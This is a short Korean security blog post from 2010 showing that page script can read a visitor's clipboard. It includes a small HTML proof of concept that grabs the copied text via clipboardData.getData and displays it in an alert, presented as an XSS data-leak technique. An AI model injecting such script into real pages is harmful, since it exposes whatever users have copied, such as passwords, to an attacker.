Clipboard 내용 유출

위험한_친구들/십자군_XSS 2010. 10. 28. 00:12

스크립트로 Clipboard의 내용까지 XSS 할수 있네요..
즉 copy+c 로 카피한 내용 부분 까지 악의적인 사용자에게 유출 될수 있다는 얘기죠..--;

 예>

<HTML>
 <HEAD>
  <TITLE> Clipboard XSS </TITLE>
 </HEAD>
 <BODY>
<script>var memo = clipboardData.getData("Text");
if (memo!=null) {
alert(memo);
}
</script>
 </BODY>
</HTML>


악의적인 사용은 사용자 본인에게 책임이 있음을 명시합니다. 
금일도 보안 합시다.

저작자표시 비영리 변경금지

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

XSS-Harvest / xss-harvest.pl  (0) 2011.08.29
Adobe RoboHelp 9 DOM Cross Site Scripting  (0) 2011.08.16
Mailto: Crash (may crash you)  (0) 2011.08.08
XSS BASIC SITE  (0) 2011.08.08
XSS를 이용한 키로거  (0) 2010.10.27
Posted by bitfox
l
블로그 이미지
작은여우와 암행어사 IT Security Consulting History bitfox

최근에 올라온 글

공지사항

글 보관함

최근에 받은 트랙백

  • Total :
  • Today :
  • Yesterday :
tistory 티스토리 가입하기!
rss

카테고리

분류 전체보기 (190)
Hello_World! (24)
위험한_친구들 (50)
수술_도구 (20)
생각하는_보안 (20)
삽질이라쓰고_경험이라_읽는다. (10)
글로벌_Gossip (28)
나의 관심 (10)
도전_리버서 (5)
도전_외래어 (5)
a Shot a Day (18)

달력

«   2024/04   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30

링크

티스토리툴바